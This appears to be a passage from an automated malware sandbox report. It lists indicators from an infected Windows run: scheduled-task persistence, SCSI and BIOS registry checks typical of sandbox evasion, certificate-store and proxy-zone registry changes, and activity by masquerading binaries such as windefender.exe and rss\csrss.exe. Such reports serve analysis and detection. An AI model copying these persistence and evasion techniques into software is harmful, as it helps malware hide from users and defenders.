File created C:\Windows\Tasks\ztlTbPYifermRZH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\HKFMMLmWpeGdwIqGl.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSAD14.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSAD14.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\Conhost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" C:\Windows\windefender.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1802 = "Line Islands Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\Conhost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\Conhost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" C:\Windows\windefender.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000a5643c38d5441c905f2096a0ee19cc5ffd886f65d927250b3a87d43416b5456b8d47a4611e3ce254615acbcd426c5b9e0a92077098d1ad86d009 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Discuz! C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 4047bb803107da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\MrtCache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{64395526-2437-4018-833D-BE2890EEF015} = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
